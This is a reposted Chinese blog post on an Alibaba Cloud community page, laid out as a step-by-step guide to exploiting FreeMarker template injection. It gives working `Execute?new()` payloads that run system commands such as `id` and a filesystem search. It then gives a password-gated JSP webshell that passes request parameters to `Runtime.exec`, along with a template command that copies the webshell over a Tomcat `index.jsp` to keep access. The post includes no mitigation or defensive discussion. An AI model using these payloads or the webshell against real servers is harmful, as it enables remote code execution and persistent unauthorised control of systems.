AI 助理
文档备案控制台
开发者社区 云计算 文章 正文

FreeMarker执行系统命令

2017-11-16 2404
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

1、寻找可以上传FTL模板的漏洞点


2、尝试注入FTL模板

1
2
<#assign test="freemarker.template.utility.Execute"?new()>
${test("id")}


3、查找上传的FTL文件保存路径

1
2
<#assign test="freemarker.template.utility.Execute"?new()>
${test("find / -name *.ftl")}


4、获取WebShell

1
2
3
4
# webshell.ftl
<%if ("023".equals(request.getParameter("pwd")))
{java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1; byte[] b = new byte[2048];while((a=in.read(b))!=-1){out.println(new String(b));}}%>
1
2
3
4
# main.ftl
<#assign test="freemarker.template.utility.Execute"?new()>
${test("cp /home/bmpapp/upc_plugin_home/export_plugin/development/user/webshell.ftl 
/home/bmpapp/tomcat/webapps/default.war/index.jsp")}


5、访问index.jsp


















本文转自fatshi51CTO博客,原文链接:http://blog.51cto.com/duallay/1936931 ,如需转载请自行联系原作者




文章标签:
索引
技术小甜
目录
相关文章
绿皮龟
|
设计模式 数据可视化 Java
JD-GUI和JAD对War包和Jar包进行反编译教学
JD-GUI和JAD是两个用于反编译Java字节码的工具。代码调试:当你需要调试Java代码时,可以使用JD-GUI将Java类反编译为可读的源代码,以便进行调试和分析。代码分析:如果你需要对Java类进行深入的分析,例如了解代码结构、方法调用关系等,可以使用JD-GUI来反编译Java类,并查看反编译后的源代码。代码重构:如果你需要修改现有的Java类,可以使用JD-GUI将Java类反编译为可读的源代码,然后进行修改。注意,反编译后的源代码可能不完全与原始源代码相同,因此在进行修改时需要谨慎。
绿皮龟
1270 1
lx4hkk5yox6ya
|
Java 数据安全/隐私保护 Spring
SpringSecurity 权限管理的实现
SpringSecurity是一个权限管理框架,核心是认证和授权,前面介绍过了认证的实现和源码分析,本文重点来介绍下权限管理这块的原理。
lx4hkk5yox6ya
310 0
烂泥行天下
|
Shell Linux
【解决】-bash: ftp: command not found
烂泥行天下
8689 0
dufadayang
|
前端开发 安全 API
跨域请求的常见场景有哪些?
了解这些常见的跨域请求场景,有助于我们更好地理解和处理跨域问题,通过合理的技术手段和配置来实现跨域资源的安全访问和交互。
dufadayang
544 64
丰宝宝
|
运维 监控 大数据
运维之道:从新手到高手的蜕变之路
【10月更文挑战第17天】 本文以“运维之道”为主题,探讨了运维工程师从新手到高手的成长历程。文章通过生动的案例和实用的技巧,引导读者理解运维工作的本质、内涵和意义,以及如何在实践中不断提升自己的技能和能力。同时,文章也强调了持续学习和自我提升的重要性,鼓励读者在运维领域不断探索和创新。
丰宝宝
435 8
Srlua
|
安全 网络安全 数据安全/隐私保护
CTF竞赛:一场网络安全技术的盛宴
CTF竞赛:一场网络安全技术的盛宴
Srlua
635 0
weixin_836869520
|
JSON 安全 Java
Elasticsearch 语法指南(全)
Elasticsearch 语法指南(全)
weixin_836869520
368 1
洋葱吃不下
|
监控 Java API
Java的日志框架
Java的日志框架
洋葱吃不下
219 2
轩公子谈技术
|
安全 Java API
Java审计之Freemarker模板注入漏洞
Java审计之Freemarker模板注入漏洞
轩公子谈技术
12190 1
李火火
|
SQL 安全 数据库
用友畅捷CRM存在SQL注入漏洞
用友畅捷CRM存在SQL注入漏洞,攻击者可通过使用工具获取数据库相关敏感信息,拿到服务器控制权限。
李火火
462 1

热门文章

最新文章

  • 1
    从数砖开源 Delta Lake 说起
  • 2
    使用快照策略和镜像备份数据
  • 3
    打通前后端逻辑,客户端Flutter代码一天上线
  • 4
    windows命令查询硬件信息(CMD)
  • 5
    云数据库POLARDB优势解读系列文章之①——10分钟入门
  • 6
    深入理解SpringBoot的过滤条件--AutoConfigure
  • 7
    租用阿里云服务器一年要多少钱?2025年费用价格全解析
  • 8
    k8s1.18多master节点高可用集群安装-超详细中文官方文档
  • 9
    基因检测,如何帮助患者对抗疾病?
  • 10
    【纠结篇】纠结之 vlan
  • 1
    OpenClaw/Clawdbot实战攻略:3步部署+3大核心skills+5个颠覆级案例,实现“聊天框里办大事”
    116
  • 2
    MEaSUREs 格陵兰冰盖测绘项目(GrIMP)基于 GeoEye 和 WorldView 影像的数字高程模型 V002
    52
  • 3
    阿里云OpenClaw/Clawdbot企业级部署指南:6大核心技能+安全运维,打造全天候AI助理
    95
  • 4
    Discuz_X1.5_SC_UTF8怎么用?完整部署与配置指南(新手必看)
    76
  • 5
    VMware vSphere 9.0.2.0 发布 - 企业级工作负载平台
    52
  • 6
    VMware vCenter Server 9.0.2.0 发布 - 集中管理 vSphere 环境
    42
  • 7
    Cisco Expressway Release X15.4.0 - 统一通信网关
    32
  • 8
    Sophos Firewall (SFOS) v21.5 MR2 发布 - 下一代防火墙
    37
  • 9
    macOS Catalina 10.15.8 (19H2036) 发布
    69
  • 10
    2026年OpenClaw(原Clawdbot/Moltbot)极速安装到生产指南与企业级技能实战流程
    102

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    第五届伏魔挑战赛如约来袭,诚邀各路高手来战!